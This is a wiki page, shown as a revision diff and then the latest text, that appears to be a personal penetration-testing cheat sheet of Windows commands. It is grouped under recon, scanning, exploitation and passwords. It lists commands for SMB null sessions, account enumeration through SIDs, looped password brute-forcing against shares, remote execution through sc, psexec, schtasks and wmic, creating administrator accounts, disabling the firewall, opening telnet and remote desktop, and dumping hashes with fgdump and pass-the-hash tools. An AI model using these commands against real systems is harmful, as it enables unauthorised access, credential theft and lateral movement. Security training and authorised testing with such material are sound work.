Difference between revisions of "Windows Commands"
(13 intermediate revisions by one other user not shown) | |||
Line 26: | Line 26: | ||
* -w <N> -- wait for Nms before timing out (default 4000) | * -w <N> -- wait for Nms before timing out (default 4000) | ||
=== | ===SMB session=== | ||
Establishing a null session | |||
<pre>net use \\<target> "" /u:""</pre> | <pre>net use \\<target> "" /u:""</pre> | ||
* Pulling credentials | Establishing an authenticated session | ||
<pre>net use \\<target> <password> /u:<username></pre> | |||
Mount a share | |||
<pre>net use * \\<target>\<share> <password> /u:<username> | |||
net use * \\<target>\<share> <password> /u:<machinename>\<username> | |||
net use * \\<target>\c$ <password> /u:<username></pre> | |||
Dropping SMB sessions | |||
<pre>net use \\<target> /del</pre> | |||
Dropping all SMB sessions (bad idea) | |||
<pre>net use * /del</pre> | |||
===Pulling credentials (w/ SMB session)=== | |||
Pulling credentials | |||
<pre>enum -U <target> | <pre>enum -U <target> | ||
enum -G <target></pre> | enum -G <target></pre> | ||
user2sid | |||
* Outputs in the form S-X-Y-target_sid-RID | |||
<pre>user2sid \\<target> <machine_name></pre> | <pre>user2sid \\<target> <machine_name></pre> | ||
sid2user | |||
* Requires spaces instead of dashes | |||
<pre>sid2user \\<target> 5 <target_sid> <N></pre> | <pre>sid2user \\<target> 5 <target_sid> <N></pre> | ||
<pre>for /L %i in (1000, 1, 1050) do @sid2user \\<target> 5 <target_sid> %i</pre> | <pre>for /L %i in (1000, 1, 1050) do @sid2user \\<target> 5 <target_sid> %i</pre> | ||
Line 63: | Line 78: | ||
Start a service | Start a service | ||
<pre>sc config <servicename> start= | <pre>sc config <servicename> start= demand | ||
sc start <servicename> | sc start <servicename></pre> | ||
Starting telnet | Starting telnet | ||
<pre>sc query tlntsvr | <pre>sc query tlntsvr | ||
sc config tlntsvr start= | sc config tlntsvr start= demand | ||
sc start tlntsvr</pre> | sc start tlntsvr</pre> | ||
Starting terminal services | Starting terminal services | ||
<pre>sc query termservice | <pre>sc query termservice | ||
sc config termservice start= | sc config termservice start= demand | ||
sc start termservice</pre> | sc start termservice</pre> | ||
Using sc to invoke an executable | |||
<pre>net use \\<target> <password> /u:<username> | |||
sc \\<target> create <name> binpath= <command> | |||
sc \\<target> start <name></pre> | |||
Making that service invoke another executable | |||
<pre>sc \\<target> <name> create binpath= "cmd.exe /k <command>"</pre> | |||
===Variables=== | |||
Finding environmental variables | |||
<pre>set</pre> | |||
Finding a specific variable | |||
<pre>set <variable> | |||
echo %<variable>% | |||
set username | |||
set path | |||
set systemroot | |||
echo %systemroot% | |||
cd %systemroot% | |||
etc.</pre> | |||
===Users and groups=== | ===Users and groups=== | ||
Line 90: | Line 127: | ||
Adding a user to a group | Adding a user to a group | ||
<pre>net localgroup & | <pre>net localgroup <groupname> <username> /add</pre> | ||
Adding a user to the telnet users group | Adding a user to the telnet users group | ||
<pre>net user <username> <password> /add | <pre>net user <username> <password> /add | ||
net localgroup TelnetClients /add | net localgroup TelnetClients /add | ||
net localgroup TelnetClients <username> /add | net localgroup TelnetClients <username> /add</pre> | ||
Adding a user to the terminal services group | Adding a user to the terminal services group | ||
<pre>net localgroup "Remote Desktop Users" <username> /add | <pre>net localgroup "Remote Desktop Users" <username> /add</pre> | ||
List administrators | |||
<pre>net localgroup administrators</pre> | |||
Add an administrator | |||
<pre>net user <username> %lt;password> /add | |||
net localgroup administrators <username> /add</pre> | |||
Remove a user from a group | |||
<pre>net localgroup <group> <username> /del</pre> | |||
Delete a user | |||
<pre>net user <username> /del</pre> | |||
===Firewall interaction=== | ===Firewall interaction=== | ||
Help | |||
<pre>netsh /?</pre> | |||
Show config | |||
<pre>netsh firewall show config</pre> | |||
Open a specific port | |||
<pre>netsh firewall add portopening protocol = <TCP|UDP> port = <port> name = <comment> scope = custom addresses = <address/CIDR></pre> | |||
Remove the port opening | |||
<pre>netsh firewall del portopening protocol = <TCP|UDP> port = <port></pre> | |||
Disable the firewall completely (bad idea) | |||
<pre>netsh firewall set opmode disable</pre> | |||
Opening the firewall for telnet | Opening the firewall for telnet | ||
<pre>netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address></pre> | <pre>netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address></pre> | ||
Line 111: | Line 176: | ||
===Registry interaction=== | ===Registry interaction=== | ||
Query a key | |||
<pre>reg query <keyname></pre> | |||
Adding a key | |||
<pre>reg add <keyname> /v <valuename> /t <type> /d <data></pre> | |||
Export data | |||
<pre>reg export <keyname> <filename.reg></pre> | |||
Import data | |||
<pre>reg import <filename.reg></pre> | |||
Enabling terminal services | Enabling terminal services | ||
<pre>reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0</pre> | <pre>reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0</pre> | ||
Line 117: | Line 194: | ||
Finding a port | Finding a port | ||
<pre>netstat -an | find "<port>"</pre> | <pre>netstat -an | find "<port>"</pre> | ||
===ipconfig=== | |||
Dump the DNS cache | |||
<pre>ipconfig /displaydns</pre> | |||
===arp=== | |||
Dump the ARP cache | |||
<pre>arp -a</pre> | |||
===Looping=== | |||
/L loop | |||
<pre>for /L %i in (<start>,<step>,<stop>) do <command></pre> | |||
Counting | |||
<pre>for /L %i in (1,1,255) do @echo %i</pre> | |||
Ping scanning | |||
<pre>for /L %i in (1,1,255) do @echo 10.10.10.%i & @ping -n 5 10.10.10.%i | find "Reply"</pre> | |||
DNS bruteforce | |||
<pre>for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i</pre> | |||
/F loop | |||
<pre>for /F ["<options>"] %i in (<stuff>) do <command></pre> | |||
Looping through passwords | |||
<pre>for /F %i in (password.lst) do @echo %i & @net use \\<target> %i /u:<username> 2>nul && pause</pre> | |||
Portscanning from a file | |||
<pre>for /F %i in (ports.txt) do @nc -n -vv -w3 10.10.10.50 %i</pre> | |||
===psexec=== | |||
Using psexec (sysinternals) | |||
* -s to run as system | |||
* -c to copy the program to the target first | |||
* -d to run in "detached" mode (no console) | |||
<pre>psexec \\<target> -d -u <user> -p <password> <command></pre> | |||
===at/schtasks=== | |||
Starting the scheduler service | |||
<pre>net use \\<target> <password> <username> | |||
sc [\\<target>] query schedule | |||
sc [\\<target>] start schedule</pre> | |||
Scheduling with at: | |||
<pre>at [\\<target>] <HH:MM><A|P> <command></pre> | |||
Scheduling with schtasks | |||
<pre>schtasks /create /tn <taskname> /s <target> /u <user> /p <password> /sc <frequency> /st <starttime> /sd <startdate> /tr <command></pre> | |||
===wmic=== | |||
Running a program | |||
<pre>wmic /node:<target> /user:<username> /password:<password> process call create <command></pre> | |||
List processes | |||
<pre>wmic /node:<target> /user:<username> /password:<password> process list brief</pre> | |||
<pre>wmic /node:<target> /user:<username> /password:<password> process where processid="<pid>" delete</pre> | |||
<pre>wmic /node:<target> /user:<username> /password:<password> process where name="<name>" delete</pre> | |||
==Passwords== | |||
===Account lockout=== | |||
Info on Windows accounts | |||
<pre>net accounts | |||
net accounts /domain</pre> | |||
===fgdump=== | |||
Options | |||
* -c -- don't get cached credentials | |||
* -h <target> | |||
* -u <username> | |||
<pre>fgdump -c -h <target> -u <username></pre> | |||
===Pass-the-hash toolkit (psh-toolkit)=== | |||
Trend finally noticed/deleted these programs, so I don't have their parameters handy | |||
* whosthere-exe | |||
* genhash.exe | |||
* iam.exe | |||
==Helpful hints== | |||
===ftp=== | |||
Download a file as anonymous | |||
<pre>ftp -A -s:ftp-script.txt <host></pre> | |||
The script | |||
<pre>get <file> | |||
bye</pre> | |||
An even better script, that grabs everything in the base directory | |||
<pre>prompt | |||
mget . | |||
bye | |||
</pre> |
Latest revision as of 09:13, 21 January 2011
Recon
nslookup
- Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
nslookup <site>
- Interactive mode:
nslookup > [name or ip] > server [server ip] > set type=any > ls -d [target_domain] [> filename] > view [filename]
- No recurse:
> set norecurse > set recurse
Scanning
tracert
Parameters
- -d -- don't resolve names
- -h <N> -- max number of hops (default 30)
- -j <hostlist> -- use loose source routing
- -w <N> -- wait for Nms before timing out (default 4000)
SMB session
Establishing a null session
net use \\<target> "" /u:""
Establishing an authenticated session
net use \\<target> <password> /u:<username>
Mount a share
net use * \\<target>\<share> <password> /u:<username> net use * \\<target>\<share> <password> /u:<machinename>\<username> net use * \\<target>\c$ <password> /u:<username>
Dropping SMB sessions
net use \\<target> /del
Dropping all SMB sessions (bad idea)
net use * /del
Pulling credentials (w/ SMB session)
Pulling credentials
enum -U <target> enum -G <target>
user2sid
- Outputs in the form S-X-Y-target_sid-RID
user2sid \\<target> <machine_name>
sid2user
- Requires spaces instead of dashes
sid2user \\<target> 5 <target_sid> <N>
for /L %i in (1000, 1, 1050) do @sid2user \\<target> 5 <target_sid> %i
Exploitation
Finding client-side programs
dir /s "c:\Program Files"
dir /s /b "c:\Program Files\*.exe"
Service interaction
List running services
sc query
List all services
sc query state= all
List all service names
sc query state= all | find "SERVICE_NAME"
Query service information
sc query <servicename> sc qc <servicename>
Start a service
sc config <servicename> start= demand sc start <servicename>
Starting telnet
sc query tlntsvr sc config tlntsvr start= demand sc start tlntsvr
Starting terminal services
sc query termservice sc config termservice start= demand sc start termservice
Using sc to invoke an executable
net use \\<target> <password> /u:<username> sc \\<target> create <name> binpath= <command> sc \\<target> start <name>
Making that service invoke another executable
sc \\<target> <name> create binpath= "cmd.exe /k <command>"
Variables
Finding environmental variables
set
Finding a specific variable
set <variable> echo %<variable>% set username set path set systemroot echo %systemroot% cd %systemroot% etc.
Users and groups
Listing users
net user
Creating a user
net user <username> <password> /add
Listing groups
net localgroup
Creating a group
net localgroup <groupname> /add
Adding a user to a group
net localgroup <groupname> <username> /add
Adding a user to the telnet users group
net user <username> <password> /add net localgroup TelnetClients /add net localgroup TelnetClients <username> /add
Adding a user to the terminal services group
net localgroup "Remote Desktop Users" <username> /add
List administrators
net localgroup administrators
Add an administrator
net user <username> %lt;password> /add net localgroup administrators <username> /add
Remove a user from a group
net localgroup <group> <username> /del
Delete a user
net user <username> /del
Firewall interaction
Help
netsh /?
Show config
netsh firewall show config
Open a specific port
netsh firewall add portopening protocol = <TCP|UDP> port = <port> name = <comment> scope = custom addresses = <address/CIDR>
Remove the port opening
netsh firewall del portopening protocol = <TCP|UDP> port = <port>
Disable the firewall completely (bad idea)
netsh firewall set opmode disable
Opening the firewall for telnet
netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address>
Opening the firewall for terminal services
netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = <address>
Opening the firewall for SSH
netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = <address>
Registry interaction
Query a key
reg query <keyname>
Adding a key
reg add <keyname> /v <valuename> /t <type> /d <data>
Export data
reg export <keyname> <filename.reg>
Import data
reg import <filename.reg>
Enabling terminal services
reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0
netstat
Finding a port
netstat -an | find "<port>"
ipconfig
Dump the DNS cache
ipconfig /displaydns
arp
Dump the ARP cache
arp -a
Looping
/L loop
for /L %i in (<start>,<step>,<stop>) do <command>
Counting
for /L %i in (1,1,255) do @echo %i
Ping scanning
for /L %i in (1,1,255) do @echo 10.10.10.%i & @ping -n 5 10.10.10.%i | find "Reply"
DNS bruteforce
for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i
/F loop
for /F ["<options>"] %i in (<stuff>) do <command>
Looping through passwords
for /F %i in (password.lst) do @echo %i & @net use \\<target> %i /u:<username> 2>nul && pause
Portscanning from a file
for /F %i in (ports.txt) do @nc -n -vv -w3 10.10.10.50 %i
psexec
Using psexec (sysinternals)
- -s to run as system
- -c to copy the program to the target first
- -d to run in "detached" mode (no console)
psexec \\<target> -d -u <user> -p <password> <command>
at/schtasks
Starting the scheduler service
net use \\<target> <password> <username> sc [\\<target>] query schedule sc [\\<target>] start schedule
Scheduling with at:
at [\\<target>] <HH:MM><A|P> <command>
Scheduling with schtasks
schtasks /create /tn <taskname> /s <target> /u <user> /p <password> /sc <frequency> /st <starttime> /sd <startdate> /tr <command>
wmic
Running a program
wmic /node:<target> /user:<username> /password:<password> process call create <command>
List processes
wmic /node:<target> /user:<username> /password:<password> process list brief
wmic /node:<target> /user:<username> /password:<password> process where processid="<pid>" delete
wmic /node:<target> /user:<username> /password:<password> process where name="<name>" delete
Passwords
Account lockout
Info on Windows accounts
net accounts net accounts /domain
fgdump
Options
- -c -- don't get cached credentials
- -h <target>
- -u <username>
fgdump -c -h <target> -u <username>
Pass-the-hash toolkit (psh-toolkit)
Trend finally noticed/deleted these programs, so I don't have their parameters handy
- whosthere-exe
- genhash.exe
- iam.exe
Helpful hints
ftp
Download a file as anonymous
ftp -A -s:ftp-script.txt <host>
The script
get <file> bye
An even better script, that grabs everything in the base directory
prompt mget . bye